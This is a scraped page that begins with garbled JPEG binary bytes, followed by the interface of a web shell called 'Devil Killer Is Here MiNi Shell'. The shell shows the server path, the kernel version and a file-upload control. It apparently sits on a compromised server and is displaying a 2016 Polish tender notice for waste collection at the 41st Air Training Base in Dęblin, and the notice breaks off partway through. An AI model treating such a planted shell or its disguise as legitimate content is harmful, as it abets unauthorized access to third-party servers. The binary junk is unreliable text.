JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160128/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160128/19696-N-2016.html

<p class="kh_header"><b>Dęblin: Świadczenie usługi odbioru i gospodarowania odpadami komunalnymi niesegregowanymi i segregowanymi z terenów administrowanych przez 41 Bazę Lotnictwa Szkolnego w Dęblinie - Nr 5/16/N</b><br>
<b>Numer ogłoszenia: 19696 - 2016; data zamieszczenia: 28.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 41 Baza Lotnictwa Szkolnego , ul. Brygady Pościgowej 5, 08-521 Dęblin, woj. lubelskie, tel. 81 551 75 25, faks 81 551 95 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.41blsz.wp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi odbioru i gospodarowania odpadami komunalnymi niesegregowanymi i segregowanymi z terenów administrowanych przez 41 Bazę Lotnictwa Szkolnego w Dęblinie - Nr 5/16/N.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usługi odbioru i gospodarowania odpadami komunalnymi niesegregowanymi (zmieszanymi) - kod odpadu 20 03 01 i odpadami komunalnymi segregowanymi typu szkło - kod odpadu 20 01 02 , papier i tektura 
- kod odpadu 20 01 01 i tworzywo sztuczne - kod odpadu 20 01 39 
 na następujących kompleksach wojskowych administrowanych przez 41 Bazę Lotnictwa Szkolnego w Dęblinie:
Roskosz gmina Biała Podlaska, 21-500 Biała Podlaska;
Sidorki gmina Biała Podlaska, 21-500 Biała Podlaska;
Wojskowa Komenda Uzupełnień Biała Podlaska gmina Biała Podlaska, 
ul. 1000-lecia 28, 21-500 Biała Podlaska
Usługa odbioru i gospodarowania wymienionych wyżej odpadów obejmuje również zabezpieczenie właściwej ilości pojemników przeznaczonych do magazynowania odpadów komunalnych każdego typu. Pojemniki będą własnością Wykonawcy.
2.Szacunkowa ilość odpadów komunalnych niesegregowanych z terenu wszystkich kompleksów wojskowych objętych usługą stanowiącą przedmiot zamówienia w okresie od dnia podpisania umowy do dnia 31.12.2016  roku wyniesie ok. 188 m3. Przewiduje się, że ilość gromadzonych odpadów z segregacji - odpadów typu: szkło- kod odpadu 20 01 02,  papier i tektura  - kod odpadu  20 01 01 i tworzywo sztuczne - kod odpadu  20 01 39 stanowić będzie ok. 6 m3 w okresie od dnia podpisania umowy do 31.12.2016  roku.
3.Podane ilości odpadów komunalnych niesegregowanych i segregowanych są ilościami szacunkowymi i służą jedynie do zapoznania się Wykonawców z przybliżonymi ilościami odpadów. Rozliczane będą faktycznie odebrane m3 odpadów komunalnych każdego typu. Odbiór odpadów z terenu objętego usługą realizowany będzie zgodnie z harmonogramem i do wartości oferty Wykonawcy. Zamawiający zastrzega sobie możliwość zmniejszenia ilości odpadów w okresie obowiązywania umowy w przypadku wyłączenia z użytkowania któregokolwiek z wymienionych wyżej kompleksów, administrowanych przez Zamawiającego; bądź też poszczególnych obiektów wchodzących w ich skład. W takim przypadku Wykonawcy nie będą przysługiwać żadne roszczenia pieniężne. 
4.Zamawiający zastrzega sobie prawo do zmiany harmonogramu odbioru odpadów 
z uwagi na jego bieżące potrzeby (w sytuacji, kiedy w toku realizacji umowy okaże się, że ustalona w harmonogramie częstotliwość odbioru odpadów okaże się niewystarczająca lub nadmierna, w szczególności z uwagi na wyłączenie z użytkowania któregokolwiek z wymienionych w §1 ust. 2 umowy kompleksów, administrowanych przez Zamawiającego, bądź też poszczególnych obiektów wchodzących w ich skład bądź też zwiększenie ilości wytwarzanych odpadów 
na skutek zwiększenia stanu osobowego). W takim przypadku Wykonawcy nie przysługują żadne roszczenia pieniężne.
5.W szczególnie uzasadnionych przypadkach - osiągnięcia wyższych stanów gotowości bojowej, szkolenia poligonowego, szkolenia rezerw osobowych, likwidacja klęsk żywiołowych, innych obowiązków nałożonych przez organ władzy państwowej - dokonana będzie przez Zamawiającego zmiana harmonogramu odbioru odpadów komunalnych, spowodowana zwiększeniem ich ilości.
6.Zamawiający przewiduje segregację odpadów na następujące rodzaje odpadów: 
szkło - kod odpadu 20 01 02, papier i tektura - kod odpadu  20 01 01 i tworzywo sztuczne - kod odpadu  20 01 39. 
Odpady segregowane będą w trzech typach pojemników, każdy rodzaj odpadu 
w osobnym pojemniku. Pojemniki ustawione zostaną w 4 punktach. Wymagane ilości i typy pojemników do magazynowania odpadów komunalnych niesegregowanych i segregowanych oraz wymagania stawiane im przez Zamawiającego są następujące:
­na odpady komunalne niesegregowane wymagane są pojemniki metalowe 
lub z tworzywa sztucznego o pojemności 1,1 m3 w ilości 4 szt., sprawne technicznie, estetyczne ze szczelnymi pokrywami, łatwymi w obsłudze, na czterech kółkach oraz pojemniki metalowe o pojemności 7 m3 w ilości 2 szt. sprawne technicznie, estetyczne ze szczelnymi pokrywami, łatwymi w obsłudze;
­na odpady segregowane wymagane są pojemniki wykonane z tworzywa sztucznego, umożliwiające segregację odpadów komunalnych na trzy rodzaje: szkło-kod odpadu 20 01 02, papier i tektura-kod odpadu 20 01 01 i tworzywo sztuczne-kod odpadu  
20 01 39, o pojemności 0,11 m3, sprawne technicznie, łatwe w obsłudze, estetyczne, szczelne w ilości po 4 szt. na każdy rodzaj segregowanego odpadu.
7.Wykonawcę zobowiązuje się do:
ustawienia wszystkich typów pojemników, o których mowa w punkcie 6 w miejscach wskazanych przez Zamawiającego, wymienionych w załączniku nr 2 do umowy,
każdorazowego wykonywania usługi odbioru odpadów magazynowanych 
we wszystkich typach pojemników, zgodnie z harmonogramem odbioru stanowiącym załącznik nr 2 do umowy - przez cały okres obowiązywania umowy lub 
w szczególnych  przypadkach (poza harmonogramem) na zgłoszenie telefoniczne 
i faksem/email uprawnionego przedstawiciela Zamawiającego - termin wykonania usługi zgodnie z terminem określonym w formularzu ofertowym,
wymiany podstawionych pojemników uszkodzonych lub zniszczonych w wyniku bieżącej eksploatacji (zużytych w sposób naturalny);
bieżącego utrzymywania podstawionych pojemników w odpowiednim stanie sanitarnym i technicznym, poprzez ich czyszczenie i dezynfekcję oraz w odpowiednim stanie estetycznym;
opróżniania  pojemników na odpady komunalne każdego rodzaju oraz ich ustawianie po opróżnieniu na właściwe miejsce ich postoju;
oznaczenie wszystkich pojemników do magazynowania odpadów poprzez umieszczenie na nich nazwy (logo) oraz numeru telefonu Wykonawcy,  a pojemników do segregacji dodatkowo w opis określający rodzaje segregowanych odpadów;
przekazania odebranych od Zamawiającego zmieszanych odpadów komunalnych 
oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnych instalacji do przetwarzania odpadów komunalnych wynikających  z Wojewódzkiego Planu Gospodarki Odpadami dla województwa lubelskiego. W przypadku awarii instalacji regionalnej, o której mowa powyżej, bądź w stanach odbiegających od normalnej eksploatacji, dopuszcza się skierowanie odpadów do instalacji zastępczej (art. 9 e, ust. 1 pkt. 2 Ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach; Dz. U. z 2013 r. poz. 1399 z późn. zm.). Wykonawca zobowiązuje się do przekazywania odebranych od Zamawiającego selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, (art. 9 e, ust. 1 pkt. 1 Ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach; Dz. U. z 2013 r. poz. 1399 z późn. zm.), zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z  2013r. poz. 21 
z późn. zm.);
udostępniania w razie potrzeby dodatkowych pojemników każdego typu
i opróżniania ich wg cen jednostkowych zgodnych z zawartą umową, 
oraz w razie potrzeby zmniejszenie lub zwiększenie ilości udostępnionych pojemników każdego rodzaju;
utrzymywania w czystości punktów wokół pojemników w promieniu przynajmniej 
2 m, poprzez ich oczyszczanie przy każdorazowym załadunku odpadów na pojazd
oraz usuwanie odpadów zalegających poza pojemnikami w przypadku ich przepełnienia spowodowanego niedotrzymaniem przez Wykonawcę ustalonych terminów odbiorów;
realizacji usługi z zachowaniem należytej staranności, zgodnie z przepisami         
 i zasadami bhp i ppoż. oraz z zachowaniem przepisów ustawy z dnia 27 kwietnia 2001 roku - Prawo ochrony środowiska (Dz. U. z 2013 roku, poz. 1232 z późn. zm.), 
oraz ustawy z dnia 14 grudnia 2012 roku o odpadach (Dz. U. z 2013roku, poz. 21 z późn. zm.) także w przypadku przyjętych nowelizacji lub zmian obowiązujących przepisów.
8.W celu realizacji zamówienia Wykonawca musi dysponować specjalistycznymi środkami technicznymi umożliwiającymi odbiór odpadów zgodnie 
z rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych 
od właścicieli nieruchomości (Dz. U. z 2013r. poz.122). Pojazdy muszą 
być zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów podczas ich magazynowania, przeładunku, a także transportu; konstrukcja pojazdów musi zabezpieczać przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizować oddziaływanie czynników atmosferycznych na odpady. Pojazdy muszą być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników. Pojazdy powinny być w pełni sprawne, posiadać aktualne badania techniczne, być dopuszczone do ruchu. 
9.Wykonawca może powierzyć wykonanie zamówienia podwykonawcom pod warunkiem, że podwykonawca posiada stosowne uprawnienia do wykonywania zamówienia, jeżeli do wykonania zamówienia wymagane jest posiadanie stosownych uprawnień. Podwykonawca musi posiadać uprawnienia i zezwolenia niezbędne do realizacji powierzonej mu części przedmiotu zamówienia. W takim przypadku Wykonawca zobowiązany jest poinformować Zamawiającego pisemnie lub faksem o powierzeniu wykonania zamówienia podwykonawcy przedstawiając jednocześnie Zamawiającemu uprawnienia podwykonawcy, uprawniające go do wykonywania powierzonego mu zamówienia, jeżeli do wykonania zamówienia wymagane jest posiadanie stosownych uprawnień przed faktycznym wykonaniem przez podwykonawcę powierzonej mu części zamówienia. 
10.Powierzenie wykonania zamówienia podwykonawcy nie zwalnia Wykonawcy od odpowiedzialności i zobowiązań wynikających z umowy. W takim przypadku Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom oraz przedstawienia, jeśli są wymagane, uprawnień do wykonywania działalności określonych w punkcie 9 w zakresie w jakim zamówienie będzie wykonywane przez podwykonawców. Wykonawca przedstawi 
w takim przypadku także pisemne zobowiązanie podwykonawcy do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.32.00-8, 90.50.00.00-2, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium dla postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez wójta, burmistrza lub prezydenta miasta, o którym mowa w art. 9 b, ustawy z dnia  13 września 1996 r. o utrzymaniu czystości i porządku w gminach,(Dz. U. z 2013 r. poz. 1399 z późn. zm.). - wymagany dokument potwierdzający wpis do w/w rejestru na terenie gminy Biała Podlaska potwierdzony za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy;

Dokument ten powinien obejmować odpady wymienione w opisie przedmiotu zamówienia, tj. odpady o następujących kodach: 20 03 01, 20 01 02, 20 01 01, 
20 01 39
2) ważne zezwolenie na prowadzenie działalności w zakresie transportu odpadów zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013r. poz. 21, z późn. zm.) w zakresie objętym przedmiotem zamówienia - wymagana kopia zezwolenia lub dokument potwierdzający wpis do w/w rejestru na terenie gminy objętej przedmiotem zamówienia potwierdzona/y za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy;
3) ważne zezwolenie na prowadzenie działalności w zakresie zbierania odpadów zgodnie z  ustawą z dnia 14 grudnia 2012r. o odpadach ( Dz. U. z 2013r. poz. 21, z późn. zm.) w zakresie objętym przedmiotem zamówienia, jeżeli Wykonawca samodzielnie zbiera odpady - wymagana kopia zezwolenia na terenie gminy objętej przedmiotem
zamówienia potwierdzonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy;
4) ważne zezwolenie na prowadzenie działalności w zakresie przetwarzania odpadów zgodnie z  ustawą z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r. poz. 21, z późn. zm.), w przypadku gdy Wykonawca zamierza prowadzić przetwarzanie odpadów we własnym zakresie - wymagana kopia zezwolenia na terenie gminy objętej przedmiotem zamówienia potwierdzona za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do reprezentowania Wykonawcy.

Wykonawca ma obowiązek posiadania w/w zezwoleń lub wpisów do rejestrów 
przez cały czas trwania umowy oraz ich okazywania Zamawiającemu na każde 
jego wezwanie. Brak jakiegokolwiek wymaganego dokumentu stanowić będzie podstawę do odstąpienia od umowy przez Zamawiającego ze skutkiem natychmiastowym. W takim przypadku Wykonawcy nie przysługują żadne roszczenia w stosunku do Zamawiającego. W przypadku gdyby którekolwiek z dotychczasowych zezwoleń wygasło lub zostało cofnięte w okresie obowiązywania umowy, Wykonawca zobowiązany jest przedstawić nowe zezwolenie w tym zakresie, nie później niż w ostatnim dniu obowiązywania dotychczasowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek ten spełnią Wykonawcy, którzy złożą oświadczenie w trybie art. 22 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania odpowiednim potencjałem technicznym niezbędnym 
do wykonania zamówienia: warunek ten spełnią Wykonawcy, którzy wykażą, iż dysponują następującymi pojemnikami na odpady (załącznik nr 2 do umowy):

1) na odpady komunalne niesegregowane wymagane są pojemniki metalowe 
lub z tworzywa sztucznego o pojemności 1,1 m3 w ilości 4szt., sprawne technicznie, estetyczne, ze szczelnymi pokrywami, łatwymi w obsłudze, na czterech kółkach oraz pojemniki metalowe o pojemności 7 m3 w ilości 2 szt. sprawne technicznie, estetyczne ze szczelnymi pokrywami, łatwymi w obsłudze,
2) na odpady segregowane wymagane są pojemniki wykonane z tworzywa sztucznego, umożliwiające segregacje odpadów komunalnych na trzy rodzaje: szkło-kod odpadu 20 01 02, papier i tektura-kod odpadu 20 01 01 i tworzywo sztuczne - kod odpadu 20 01 39, o pojemności 0,11 m3, sprawne technicznie, łatwe w obsłudze, estetyczne, szczelne w ilości po 4 szt. na każdy rodzaj segregowanego odpadu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek ten spełnią Wykonawcy, którzy złożą oświadczenie w trybie art. 22 ust.1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Warunek ten spełnią Wykonawcy, którzy złożą oświadczenie w trybie art. 22 ust.1 ustawy z dnia 
29 stycznia 2004r. Prawo zamówień publicznych (załącznik nr 2 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z 
art. 26 ust. 2b, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów dotyczących w szczególności:
a)zakresu dostępnych Wykonawcy zasobów innego podmiotu,
b)sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
c)charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.

2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcja, spółki cywilne) warunki określone w części V pkt 1) lit. b), c), d) powinien spełniać co najmniej jeden z tych Wykonawców lub wszyscy ci Wykonawcy wspólnie. Warunek określony w części V pkt. 2), 3) dotyczący niepodleganiu wykluczeniu z postępowania musi być spełniony przez każdego 
z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Warunek określony w części V pkt 1) a) - posiadanie uprawnień - musi być spełniony przez tych spośród Wykonawców wspólnie ubiegających się o zamówienie, którzy będą realizować część zamówienia wymagającą, zgodnie z przepisami prawa, posiadania stosownych dla tej części  uprawnień.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
